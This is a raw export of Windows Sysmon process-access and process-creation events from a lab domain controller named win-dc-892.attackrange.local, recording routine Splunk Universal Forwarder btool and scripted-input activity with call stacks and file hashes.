Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.293{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" 
_internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.265{266CAFBE-64F1-6064-F200-00000000AE01}41326716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64F1-6064-F100-00000000AE01}54326700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.008{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000008350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64F0-6064-F000-00000000AE01}10525444C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.001{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000008482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.840{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.842{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 